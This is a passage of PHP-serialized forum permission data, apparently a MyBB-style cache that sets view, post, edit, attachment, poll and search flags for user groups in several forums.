8:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:12;a:18:{s:3:\"pid\";s:3:\"191\";s:3:\"fid\";s:2:\"29\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:13;a:18:{s:3:\"pid\";s:3:\"225\";s:3:\"fid\";s:2:\"29\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:15;a:18:{s:3:\"pid\";s:3:\"296\";s:3:\"fid\";s:2:\"29\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:17;a:18:{s:3:\"pid\";s:3:\"444\";s:3:\"fid\";s:2:\"29\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"652\";s:3:\"fid\";s:2:\"29\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:21;a:18:{s:3:\"pid\";s:3:\"768\";s:3:\"fid\";s:2:\"29\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}}i:54;a:11:{i:1;a:18:{s:3:\"pid\";s:3:\"205\";s:3:\"fid\";s:2:\"54\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"206\";s:3:\"fid\";s:2:\"54\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:5;a:18:{s:3:\"pid\";s:3:\"207\";s:3:\"fid\";s:2:\"54\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:8;a:18:{s:3:\"pid\";s:3:\"208\";s:3:\"fid\";s:2:\"54\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"209\";s:3:\"fid\";s:2:\"54\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:12;a:18:{s:3:\"pid\";s:3:\"210\";s:3:\"fid\";s:2:\"54\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:13;a:18:{s:3:\"pid\";s:3:\"233\";s:3:\"fid\";s:2:\"54\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:15;a:18:{s:3:\"pid\";s:3:\"304\";s:3:\"fid\";s:2:\"54\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:17;a:18:{s:3:\"pid\";s:3:\"444\";s:3:\"fid\";s:2:\"54\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"660\";s:3:\"fid\";s:2:\"54\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:21;a:18:{s:3:\"pid\";s:3:\"776\";s:3:\"fid\";s:2:\"54\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}}i:30;a:11:{i:1;a:18:{s:3:\"pid\";s:3:\"842\";s:3:\"fid\";s:2:\"30\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"843\";s:3:\"fid\";s:2:\"30\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:5;a:18:{s:3:\"pid\";s:3:\"844\";s:3:\"fid\";s:2:\"30\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:8;a:18:{s:3:\"pid\";s:3:\"845\";s:3:\"fid\";s:2:\"30\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"846\";s:3:\"fid\";s:2:\"30\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:12;a:18:{s:3:\"pid\";s:3:\"847\";s:3:\"fid\";s:2:\"30\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:13;a:18:{s:3:\"pid\";s:3:\"848\";s:3:\"fid\";s:2:\"30\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:15;a:18:{s:3:\"pid\";s:3:\"849\";s:3:\"fid\";s:2:\"30\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:17;a:18:{s:3:\"pid\";s:3:\"444\";s:3:\"fid\";s:2:\"30\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"850\";s:3:\"fid\";s:2:\"30\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:21;a:18:{s:3:\"pid\";s:3:\"851\";s:3:\"fid\";s:2:\"30\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}}i:84;a:11:{i:1;a:18:{s:3:\"pid\";s:3:\"831\";s:3:\"fid\";s:2:\"84\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"832\";s:3:\"fid\";s:2:\"84\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:5;a:18:{s:3:\"pid\";s:3:\"833\";s:3:\"fid\";s:2:\"84\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:8;a:18:{s:3:\"pid\";s:3:\"834\";s:3:\"fid\";s:2:\"84\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"835\";s:3:\"fid\";s:2:\"84\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:12;a:18:{s:3:\"pid\";s:3:\"836\";s:3:\"fid\";s:2:\"84\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:13;a:18:{s:3:\"pid\";s:3:\"837\";s:3:\"fid\";s:2:\"84\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:15;a:18:{s:3:\"pid\";s:3:\"838\";s:3:\"fid\";s:2:\"84\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:17;a:18:{s:3:\"pid\";s:3:\"839\";s:3:\"fid\";s:2:\"84\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"cano